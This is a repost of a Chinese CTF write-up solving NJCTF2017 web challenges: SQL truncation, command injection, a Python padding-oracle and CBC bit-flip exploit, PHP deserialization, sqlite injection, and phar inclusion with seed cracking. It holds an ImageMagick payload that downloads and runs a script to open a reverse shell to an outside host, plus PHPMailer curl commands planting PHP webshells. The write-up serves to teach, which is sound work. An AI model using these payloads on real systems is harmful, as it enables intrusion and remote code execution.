设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 CTF WEB NJCTF2017
返回列表 发新帖
查看: 3365|回复: 0

NJCTF2017

[复制链接]
Anatasha

8

主题

57

帖子

279

积分

中级会员

Rank: 3Rank: 3

积分
279
发表于 2020-4-1 22:37:12 | 显示全部楼层 |阅读模式
web100 Login
第一题找到这个登陆界面随便注册一个登进去之后发现在getflag.php界面下有打印了自己的用户名。第一反应是二次注入,随便构造一个提交发现注册成功,而且我多点几次任然注册成功,因为用户名不能重复的,所以想到这里有长度限制试了下发现是50,所以这样就可以想办法重置admin的密码,如下:
这样就成功重置admin的密码,登进去就拿到flag了。
web100 Get Flag
这里随便输入观察下发现服务器会cat你输入的东西,那么很好办,直接用&来进行执行自己的命令就好了,这里;什么的都被过滤了。
然后就不停的向上ls最终flag在服务器的根目录下面,如下图:
web300 Be Admin
首先通过备份文件拿到源代码如下:
  1. <?php

  3. error_reporting(0);

  5. define("SECRET_KEY", "......");

  7. define("METHOD", "aes-128-cbc");



  11. session_start();



  15. function get_random_token(){

  17.     $random_token='';

  19.     for($i=0;$i<16;$i++){

  21.         $random_token.=chr(rand(1,255));

  23.     }

  25.     return $random_token;

  27. }



  31. function get_identity()

  33. {

  35.     global $defaultId;

  37.     $j = $defaultId;

  39.     $token = get_random_token();

  41.     $c = openssl_encrypt($j, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $token);

  43.     $_SESSION['id'] = base64_encode($c);

  45.     setcookie("ID", base64_encode($c));

  47.     setcookie("token", base64_encode($token));

  49.     if ($j === 'admin') {

  51.         $_SESSION['isadmin'] = true;

  53.     } else $_SESSION['isadmin'] = false;



  57. }



  61. function test_identity()

  63. {

  65.     if (!isset($_COOKIE["token"]))

  67.         return array();

  69.     if (isset($_SESSION['id'])) {

  71.         $c = base64_decode($_SESSION['id']);

  73.         if ($u = openssl_decrypt($c, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, base64_decode($_COOKIE["token"]))) {

  75.             if ($u === 'admin') {

  77.                 $_SESSION['isadmin'] = true;

  79.             } else $_SESSION['isadmin'] = false;

  81.         } else {

  83.             die("ERROR!");

  85.         }

  87.     }

  89. }



  93. function login($encrypted_pass, $pass)

  95. {

  97.     $encrypted_pass = base64_decode($encrypted_pass);

  99.     $iv = substr($encrypted_pass, 0, 16);

  101.     $cipher = substr($encrypted_pass, 16);

  103.     $password = openssl_decrypt($cipher, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv);

  105.     return $password == $pass;

  107. }







  115. function need_login($message = NULL) {

  117.     echo "   <!doctype html>

  119.         <html>

  121.         <head>

  123.         <meta charset="UTF-8">

  125.         <title>Login</title>

  127.         <link rel="stylesheet" href="CSS/target.css">

  129.             <script src="https://cdnjs.cloudflare.com/ajax/libs/prefixfree/1.0.7/prefixfree.min.js"></script>

  131.         </head>

  133.         <body>";

  135.     if (isset($message)) {

  137.         echo "  <div>" . $message . "</div>\n";

  139.     }

  141.     echo "<form method="POST" action=''>

  143.             <div class="body"></div>

  145.                 <div class="grad"></div>

  147.                     <div class="header">

  149.                         <div>Log<span>In</span></div>

  151.                     </div>

  153.                     <br>

  155.                     <div class="login">

  157.                         <input type="text" placeholder="username" name="username">

  159.                         <input type="password" placeholder="password" name="password">              

  161.                         <input type="submit" value="Login">

  163.                     </div>

  165.                      <script src='http://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>

  167.             </form>

  169.         </body>

  171.     </html>";

  173. }



  177. function show_homepage() {

  179.     echo "<!doctype html>

  181. <html>

  183. <head><title>Login</title></head>

  185. <body>";

  187.     global $flag;

  189.     printf("Hello ~~~ ctfer! ");

  191.     if ($_SESSION["isadmin"])

  193.         echo $flag;

  195.     echo "<div><a href="logout.php">Log out</a></div>

  197. </body>

  199. </html>";



  203. }



  207. if (isset($_POST['username']) && isset($_POST['password'])) {

  209.     $username = (string)$_POST['username'];

  211.     $password = (string)$_POST['password'];

  213.     $query = "SELECT username, encrypted_pass from users WHERE username='$username'";

  215.     $res = $conn->query($query) or trigger_error($conn->error . "[$query]");

  217.     if ($row = $res->fetch_assoc()) {

  219.         $uname = $row['username'];

  221.         $encrypted_pass = $row["encrypted_pass"];

  223.     }



  227.     if ($row && login($encrypted_pass, $password)) {

  229.         echo "you are in!" . "</br>";

  231.         get_identity();

  233.         show_homepage();

  235.     } else {

  237.         echo "<script>alert('login failed!');</script>";

  239.         need_login("Login Failed!");

  241.     }



  245. } else {

  247.     test_identity();

  249.     if (isset($_SESSION["id"])) {

  251.         show_homepage();

  253.     } else {

  255.         need_login();

  257.     }

  259. }
复制代码

初步观察和secconctf2016 biscuiti的源代码有点类似,进过观察分析之后初步确定思路,首先我们知道加密后的ID,也就是密文,以及token,也就是初始向量,然后我们的目的是要提交token使ID解出来为admin\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b(PS:加密填充之后),这样子就会是admin的值就能成功绕过验证,而要达到这样的目的我们首先需要通过padding oracle拿到ID对应的明文,然后进行CBC字节翻转攻击,从而实现目标,相比与secconctf2016 biscuiti要相对简单,但是中间遇到各式各样的问题,譬如请求提交的时候自己习惯性的先r=request.session(),在这里反倒起了反作用。另外要说的是这道题的服务器肯定有毒,我开始死活跑步出来,查错查了俩小时没发现问题,最后实在受不了了,把所有代码框起来while 1,过了会就拿到flag了,擦,报警了。
其实最开始我的思路是在test_identity那里触发解密进行padding oracle攻击,不过这样来说就只能爆破15位,最后一位无法得到,不过可以通过枚举来尝试,但是由于服务器的锅这样有点慢,所以我还是换成在login那里触发,不过都一样,只要能触发解密控制iv就能进行padding oracle。
下面是代码,直接运行即可得到flag:
  1. import requests

  3. import base64

  5. import time

  7. url='http://218.2.197.235:23737/'

  9. #url='http://127.0.0.1:8000'

  11. N=16

  13. phpsession=""

  15. ID=""

  17. def inject1(password):

  19.     param={'username':"' union select 'bendawangbendawangbendawang','{password}".format(password=password),'password':''}

  21.     result=requests.post(url,data=param)

  23.     #print result.content

  25.     return result



  29. def inject_token(token):

  31.     header={"Cookie":"PHPSESSID="+phpsession+";token="+token+";ID="+ID}

  33.     result=requests.post(url,headers=header)

  35.     return result



  39. def xor(a, b):

  41.     return "".join([chr(ord(a[i])^ord(b[i%len(b)])) for i in xrange(len(a))])



  45. def pad(string,N):

  47.     l=len(string)

  49.     if l!=N:

  51.         return string+chr(N-l)*(N-l)



  55. def padding_oracle(N,cipher):

  57.     get=""

  59.     for i in xrange(1,N+1):

  61.         for j in xrange(0,256):

  63.             padding=xor(get,chr(i)*(i-1))

  65.             c=chr(0)*(16-i)+chr(j)+padding+cipher

  67.             print c.encode('hex')

  69.             result=inject1(base64.b64encode(chr(0)*16+c))

  71.             if "ctfer" not in result.content:

  73.                 get=chr(j^i)+get

  75.                 time.sleep(0.1)

  77.                 break

  79.     return get



  83. session=inject1("bendawang").headers['set-cookie'].split(',')

  85. phpsession=session[0].split(";")[0][10:]

  87. print phpsession

  89. ID=session[1][4:].replace("%3D",'=').replace("%2F",'/').replace("%2B",'+').decode('base64')

  91. token=session[2][6:].replace("%3D",'=').replace("%2F",'/').replace("%2B",'+').decode('base64')



  95. middle=""

  97. middle=padding_oracle(N,ID)

  99. print "ID:"+ID.encode('base64')

  101. print "token:"+token.encode('base64')

  103. print "middle:"+middle.encode('base64')

  105. print "\n"

  107. if(len(middle)==16):

  109.     plaintext=xor(middle,token);

  111.     print plaintext.encode('base64')

  113.     des=pad('admin',N)

  115.     tmp=""

  117.     print des.encode("base64")

  119.     for i in xrange(16):

  121.         tmp+=chr(ord(token[i])^ord(plaintext[i])^ord(des[i]))

  123.     print tmp.encode('base64')



  127.     result=inject_token(base64.b64encode(tmp))

  129.     print result.content

  131.     if "flag" in result.content or "NJCTF" in result.content or 'njctf' in result.content:

  133.         input("success")
复制代码

运行:
web350 Text wall
首先同样是通过备份文件.index.php.swo拿到部分源码如下:
  1. <?php

  3. $lists = [];

  5. Class filelist{

  7.     public function __toString()

  9.     {

  11.         return highlight_file('hiehiehie.txt', true).highlight_file($this->source, true);

  13.     }

  15. }

  17. //.....

  19. ?>
复制代码

看到源码之后想到是个反序列化,根据__toString的触发条件构造如下:
  1. <?php

  3. Class filelist{

  5.     public function __toString()

  7.     {

  9.         return highlight_file('hiehiehie.txt', true).highlight_file($this->source, true);

  11.     }

  13. }

  15. //.....

  17. $a = new filelist();

  19. $b= new filelist();

  21. $b->source = '文件路径';

  23. $a->source=$b;

  25. $d=serialize($a);

  27. $e=sha1($d).$d;

  29. echo urlencode($e)."<br>";

  31. ?>
复制代码

然后就能读取文件内容,先读取的index.php,然后在里面得知flag的位置在/var/www/PnK76P1IDfY5KrwsJrh1pL3c6XJ3fj7E_fl4g,读取即获得flag,截图如下
web300 Wallet
首先通过http://218.2.197.235:23723/www.zip拿到一个加密的压缩包,发现需要密码,后来猜到密码是njctf2017解开拿到加密之后的源代码,解密之后源码如下:
  1. <?php

  3. require_once("db.php");

  5. $auth = 0;

  7. if (isset($_COOKIE["auth"])) {

  9.     $auth = $_COOKIE["auth"];

  11.     $hsh = $_COOKIE["hsh"];

  13.     if ($auth == $hsh) {

  15.         $auth = 0;

  17.     } else if (sha1((string)$hsh) == md5((string)$auth)) {

  19.         $auth = 1;

  21.     } else {

  23.         $auth = 0;

  25.     }

  27. } else {

  29.     $auth = 0;

  31.     $s = $auth;

  33.     setcookie("auth", $s);

  35.     setcookie("hsh", sha1((string)$s));

  37. }

  39. if ($auth) {

  41.     if (isset($_GET['query'])) {

  43.         $db = new SQLite3($SQL_DATABASE, SQLITE3_OPEN_READONLY);

  45.         $qstr = SQLITE3::escapeString($_GET['query']);

  47.         $query = "SELECT amount FROM my_wallets WHERE id=$qstr";

  49.         $result = $db->querySingle($query);

  51.         if (!$result === NULL) {

  53.             echo "Error - invalid query";

  55.         } else {

  57.             echo "Wallet contains: $result";

  59.         }

  61.     } else {

  63.         echo "<html><head><title>Admin Page</title></head><body>Welcome to the admin panel!<br /><br /><form name='input' action='admin.php' method='get'>Wallet ID: <input type='text' name='query'><input type='submit' value='Submit Query'></form></body></html>";

  65.     }

  67. } else echo "Sorry, not authorized.";

复制代码


然后发现一个比较sha1((string)$hsh) ==md5((string)$auth),想到弱类型,让两个都为0e开头的值即可,md5这样的很多,sha1的话需要先爆破,进过一番爆破找到一个aaK1STfY,然后就是一个数字型的sqlite注入,这里我直接脑洞出的,先是select flag from flag,不行,然后select 1 fromflag,成功,再然后select id from flag,获得flag,哈哈,省去了一些麻烦事,脑洞万岁!!,最后截图如下:
web400 picture’s wall
首先这里登陆的时候发现任何用户用任何密码都能随便登陆,然后进去又说是只有root能上传文件,它怎么区分是不是root呢?搞不懂,然后胡七八糟发现登陆的时候把host改了进去就能上传图片了,然后开始疯狂上传,上传的时候发现它对文件内容没有验证,然后过滤文件名的后缀方式是白名单,像是phtml啊,phps啊,pht啊之类的都能随便上传,访问之后发现它并不解析,只是打印,于是想到用<script>标签,成功上传执行,如下截图:
获取flag:
web450 Be Logical
首先进去随便注册一个账户,然后发现自己有500分和0金币,而且二者互换比例是1比1,之后发现一个兑换之后的refund功能,我先用1积分兑然了1金币,之后在refund的时候我抓包把points改成了1e111111,结果竟然成功了,然后我的积分成了这样,晕,太大了,
重新注册一个账户再来一次,然后就有了很多分了,兑换1000购买服务,进去如下:
它的功能就是把你上传的图片进行转化成别的格式,试了半天也没绕过,后来想到是不是imagmagick的命令执行漏洞,随便找了个poc如下:
  1. push graphic-context

  3. viewbox 0 0 640 480

  5. fill 'url(https://example.com/image.jpg"|wget http://bendawang.site:8000/a.py -O /tmp/bendawang.py && python /tmp/bendawang.py 104.160.43.154 12346")'

  7. pop graphic-context1234

复制代码

上传,执行成功反弹shell,在机器上找了好久也没有flag,于是想到是不是在别的机器上呢,然后扫一下网段,发现1,19,43三台机器80端口开着,访问一下19,返回一个什么邮件系统,然后瞬间想到之前phpmailer那个cve漏洞,但是需要一个可写的目录,后来脑洞到了一个uploads,访问发现403,好的有了,开始尝试,如下:
  1. curl http://172.17.0.19 -d "subject=aaaaa&email=aaa( -X /var/www/html/uploads/bendawang.php -OQueueDirectory=/tmp )@qq.com&message=<?php phpinfo();?>&submit=Send email"1
复制代码

发现成功执行phpinfo();,然后就开始上传木马,传了半天传了各式各样的木马也不行,算了,直接看看目录文件把,如下:
  1. curl http://172.17.0.19 -d 'subject=aaaaa&email=aaa( -X /var/www/html/uploads/bendawang5.php -OQueueDirectory=/tmp )@qq.com&message=<?php foreach (glob("../*") as $filename){echo $filename."<br>";};?>&submit=Send email'1
复制代码

访问拿到目录下文件如下:
  1. ../PHPMailer<br>../flaaaaaaag.php<br>../index.php<br>../uploads<br>1
复制代码

然后直接获取文件内容就可以了,先是用file_get_content,失败,后来直接system,成功,如下:
  1. curl http://172.17.0.19 -d 'subject=aaaaa&email=aaa( -X /var/www/html/uploads/bendawang9.php -OQueueDirectory=/tmp )@qq.com&message=<?php system("cat ../flaaaaaaag.php");?>&submit=Send email'1
复制代码

拿到文件内容如下:
  1. <?php $flag="NJCTF{y0U_r_A_G00oD_PeNt35T3r!}";?>1
复制代码

web350 chall1
首先是这道题的感觉,在这里发现了类似的题通过buffer来泄露内存https://www.smrrd.de/nodejs-hacking-challenge-writeup.html,但是怎么试了都不行,后来去github上随便搜一搜结果发现了源码
然后关键部分如下:
  1. ....

  3. var reg = /^[0-9]*$/;

  5. ....

  7. ....

  9. router.post('/login', function(req, res, next) {

  11.     if(req.body.password !== undefined) {

  13.         var endata = crypto.createHash('md5').update(req.body.password).digest("hex");

  15.         if (reg.test(endata)) {

  17.             var pwd = parseInt(endata.slice(0,3),10);

  19.             password = new Buffer(pwd);

  21.             if(password.toString('base64') == config.secret_password) {

  23.                 req.session.admin = 'yes';

  25.                 res.json({'status': 'ok' });

  27.             }else{

  29.                 res.json({'status': 'error', 'error': 'password wrong: '+password.toString()});

  31.             }

  33.         }else{

  35.             res.json({'status': 'error', 'error': 'password wrong: '+endata.toString()});

  37.         }

  39.     } else {

  41.         res.json({'status': 'error', 'error': 'password missing' });

  43.     }

  45. });1234567891011121314151617181920212223
复制代码

也就是说要找一个MD5之后的值全是0-9就好了,爆破之后找到了一个2PP7,然后发送请求如下:
成功泄露内存数据,疯狂尝试之后成功拿到flag
web450 chall2
根据第一个拿到的flag,将他作为session_keys
修改源码里面的app.js的为req.session.admin= 'yes';,然后访问获得session.sig
然后修改cookie登陆即可
base64解密之后  
web250 Guess
首先是通过文件包含直接获取源码,upload.php的源码如下:
  1. <?php

  3. error_reporting(0);

  5. function show_error_message($message)

  7. {

  9.     die("<div class="msg error" id="message">

  11.     <i class="fa fa-exclamation-triangle"></i>$message</div>");

  13. }



  17. function show_message($message)

  19. {

  21.     echo("<div class="msg success" id="message">

  23.     <i class="fa fa-exclamation-triangle"></i>$message</div>");

  25. }



  29. function random_str($length = "32")

  31. {

  33.     $set = array("a", "A", "b", "B", "c", "C", "d", "D", "e", "E", "f", "F",

  35.         "g", "G", "h", "H", "i", "I", "j", "J", "k", "K", "l", "L",

  37.         "m", "M", "n", "N", "o", "O", "p", "P", "q", "Q", "r", "R",

  39.         "s", "S", "t", "T", "u", "U", "v", "V", "w", "W", "x", "X",

  41.         "y", "Y", "z", "Z", "1", "2", "3", "4", "5", "6", "7", "8", "9");

  43.     $str = '';



  47.     for ($i = 1; $i <= $length; ++$i) {

  49.         $ch = mt_rand(0, count($set) - 1);

  51.         $str .= $set[$ch];

  53.     }



  57.     return $str;

  59. }



  63. session_start();



  67. $reg='/gif|jpg|jpeg|png/';

  69. if (isset($_POST['submit'])) {

  71.     //10822560

  73.     $seed = rand(0,999999999);

  75.     mt_srand($seed);

  77.     $ss = mt_rand();

  79.     $hash = md5(session_id() . $ss);

  81.     setcookie('SESSI0N', $hash, time() + 3600);



  85.     if ($_FILES["file"]["error"] > 0) {

  87.         show_error_message("Upload ERROR. Return Code: " . $_FILES["file-upload-field"]["error"]);

  89.     }

  91.     $check1 = ((($_FILES["file-upload-field"]["type"] == "image/gif")

  93.             || ($_FILES["file-upload-field"]["type"] == "image/jpeg")

  95.             || ($_FILES["file-upload-field"]["type"] == "image/pjpeg")

  97.             || ($_FILES["file-upload-field"]["type"] == "image/png"))

  99.         && ($_FILES["file-upload-field"]["size"] < 204800));

  101.     $check2=!preg_match($reg,pathinfo($_FILES['file-upload-field']['name'], PATHINFO_EXTENSION));





  107.     if ($check2) show_error_message("Nope!");

  109.     if ($check1) {

  111.         $filename = './uP1O4Ds/' . random_str() . '_' . $_FILES['file-upload-field']['name'];

  113.         if (move_uploaded_file($_FILES['file-upload-field']['tmp_name'], $filename)) {

  115.             show_message("Upload successfully. File type:" . $_FILES["file-upload-field"]["type"]);

  117.         } else show_error_message("Something wrong with the upload...");

  119.     } else {

  121.         show_error_message("only allow gif/jpeg/png files smaller than 200kb!");

  123.     }

  125. }

  127. ?>
复制代码


观察之后发现我们如果有文件名,我们可以通过将木马压缩进zip包,然后上传该zip文件(改成Png后缀上传),利用phar伪协议包含执行命令。
所以我们的核心就是搞到文件名,即想办法搞到$seed。
这里我将一句话写进0.php,压缩之后改名为0.png上传
然后至于这里的session_id(),我们通过设置Cookie: PHPSESSID=;就能让它为空,所以得到随机数的md5,解开后的值为732946980,通过这个http://download.openwall.net/pub/projects/php_mt_seed/工具解开得到
然后通过这份代码
  1. <?php

  3. $set = array("a", "A", "b", "B", "c", "C", "d", "D", "e", "E", "f", "F",

  5.     "g", "G", "h", "H", "i", "I", "j", "J", "k", "K", "l", "L",

  7.     "m", "M", "n", "N", "o", "O", "p", "P", "q", "Q", "r", "R",

  9.     "s", "S", "t", "T", "u", "U", "v", "V", "w", "W", "x", "X",

  11.     "y", "Y", "z", "Z", "1", "2", "3", "4", "5", "6", "7", "8", "9");

  13. $seed=138844507;

  15. mt_srand($seed);

  17. $ss = mt_rand();

  19. $str="";

  21. for ($i = 1; $i <= 32; ++$i) {

  23.     $ch = mt_rand(0, count($set) - 1);

  25.     $str .= $set[$ch];

  27. }

  29. echo $str;

  31. ?>
复制代码


生成文件名的前一部分为iT3Bip2WzUVhBITZPZrfTVeZjgmrK1DQ,加上我们上传的0.png,所以完整的文件路径为/uP1O4Ds/iT3Bip2WzUVhBITZPZrfTVeZjgmrK1DQ_0.png,然后访问
http://218.2.197.235:23735/?page=phar://uP1O4Ds/iT3Bip2WzUVhBITZPZrfTVeZjgmrK1DQ_0.png/0,最后执行命令即可拿到flag。
如下:


版权声明:本文为CSDN博主「Bendawang」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 22:35 , Processed in 0.020335 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表